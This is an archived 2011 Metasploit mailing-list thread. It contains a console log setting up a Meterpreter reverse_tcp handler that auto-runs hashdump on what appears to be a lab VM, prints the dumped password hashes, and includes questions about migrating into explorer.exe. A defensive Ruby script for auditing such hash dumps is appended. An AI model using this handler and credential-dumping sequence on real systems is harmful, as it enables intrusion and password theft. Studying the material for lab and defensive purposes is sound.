Metasploit mailing list archives

Re: News from Metasploit 4.


From: Richard Miles <richard.k.miles () googlemail com>
Date: Sat, 27 Aug 2011 14:47:32 -0500

Hi Carlos,

It really works very well, big thanks.

I noted that migrate on metasploit4 does not work without the PID. I
tried passing the name explorer.exe, but it doesn't work. Do you know of
a workaround?

I found this idea
http://blog.invisibledenizen.org/2008/12/automatic-migration-to-new-process-with.html

But it executes a new cmd; I don't want to create a new process, I
would just like to move to the existing explorer.exe. Do you know any
script or trick for this?

Also, when you call screenshot, does your Linux automatically display lynx too?
Any way to avoid it?

Thanks, and keep up the good work.

On Sat, Aug 27, 2011 at 2:15 PM, Richard Miles
<richard.k.miles () googlemail com> wrote:
Hi Carlos

I followed your step-by-step and it worked; I'm really a fool. Thanks a lot.

By the way, do you know if there is a reverse_http(s) for 64-bit Windows?

Thanks, really thanks.

On Sat, Aug 27, 2011 at 1:50 PM, Carlos Perez
<dark0perator () pauldotcom com> wrote:
works for me
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf  exploit(handler) > set AutoRunScript multi_console_command -rc /tmp/sample.rc
AutoRunScript => multi_console_command -rc /tmp/sample.rc
msf  exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf  exploit(handler) > exploit -x -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler...
msf  exploit(handler) > cat /tmp/sample.rc
[*] exec: cat /tmp/sample.rc

sysinfo
getuid
load priv
hashdump
run checkvm
msf  exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.115:1543) at 2011-08-27 14:49:29 -0400
[*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.115:1543) processing AutoRunScript 'multi_console_command -rc /tmp/sample.rc'
[*] Running Command List ...
[*]     Running command sysinfo
Computer        : CARLOS-192FCD91
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
[*]     Running command getuid
Server username: CARLOS-192FCD91\Administrator
[*]     Running command load priv
[-] The 'priv' extension has already been loaded.
[*]     Running command hashdump
Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
[*]     Running command run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine

On Aug 26, 2011, at 4:16 PM, Richard Miles wrote:

Hi HD Moore,

Thanks for the links. Does the new reverse_http work on 64-bit Windows?
How should I call it?

Any follow-up on the other 2 questions on the e-mail?

Thanks

On Fri, Aug 26, 2011 at 9:19 AM, HD Moore <hdm () metasploit com> wrote:
The Metasploit blog includes quite a bit of information on 4.0:
 https://community.rapid7.com/community/metasploit?view=blog

You can also see the release notes:
 https://community.rapid7.com/docs/DOC-1496
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework




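The hashdump lines in Carlos's session above are in pwdump format (user:rid:lm_hash:ntlm_hash:::). The following is an added example, not code from the thread or from Metasploit itself: a small Ruby audit of that format that reports what a defender reviewing such a dump wants to know, namely accounts with an empty password (NT hash of the empty string), accounts whose LM hash is still being stored (the NoLMHash policy is not in effect), and LM hashes whose second 8-byte half is the empty-block constant, which means the password is seven characters or fewer. The sample input is copied from the hashdump output in the thread; the two hash constants are the well-known hashes of the empty string.

```ruby
# Added example (not from the thread): audit pwdump-style hashdump output.
# Record format:  user:rid:lm_hash:ntlm_hash:::
EMPTY_LM      = 'aad3b435b51404eeaad3b435b51404ee'.freeze # LM hash of "" / LM not stored
EMPTY_NTLM    = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze # NT hash of ""
EMPTY_LM_HALF = EMPTY_LM[16, 16]                            # one empty 7-char LM block

# Sample input taken from the hashdump output in the thread, with two
# surrounding console lines included to show that non-records are skipped.
SAMPLE_HASHDUMP = <<~DUMP
  [*]     Running command hashdump
  Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
  HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
  [*]     Running command run checkvm
DUMP

# Parse one line; returns nil for anything that is not a pwdump record.
def parse_pwdump_line(line)
  m = /\A([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\s*\z/i.match(line.strip)
  return nil unless m
  { user: m[1], rid: m[2].to_i, lm: m[3].downcase, ntlm: m[4].downcase }
end

# Classify one parsed record. Returns an ordered array of finding symbols.
def audit_record(rec)
  findings = []
  # NT hash of the empty string: the account has no password at all.
  findings << :empty_password if rec[:ntlm] == EMPTY_NTLM
  if rec[:lm] != EMPTY_LM
    # An LM hash is present, so LM storage is enabled; LM is trivially crackable.
    findings << :lm_hash_stored
    # LM pads the password to 14 chars in two 7-char halves; an empty second
    # half means the password is at most 7 characters long.
    findings << :password_7_chars_or_less if rec[:lm][16, 16] == EMPTY_LM_HALF
  end
  # RID 500 is the built-in Administrator regardless of its display name.
  findings << :builtin_admin_rid if rec[:rid] == 500
  findings
end

# Audit a whole dump; returns { username => [findings] } for every record found.
def audit_dump(text)
  text.each_line
      .map { |l| parse_pwdump_line(l) }
      .compact
      .map { |rec| [rec[:user], audit_record(rec)] }
      .to_h
end

if $PROGRAM_NAME == __FILE__
  audit_dump(SAMPLE_HASHDUMP).each do |user, findings|
    puts "#{user.ljust(18)} #{findings.empty? ? 'no findings' : findings.join(', ')}"
  end
end
```

Run against the sample, Guest is flagged as having an empty password, HR as having an LM hash whose password is seven characters or fewer, and Administrator (RID 500) and HelpAssistant as still having LM hashes stored; SUPPORT_388945a0 produces no findings.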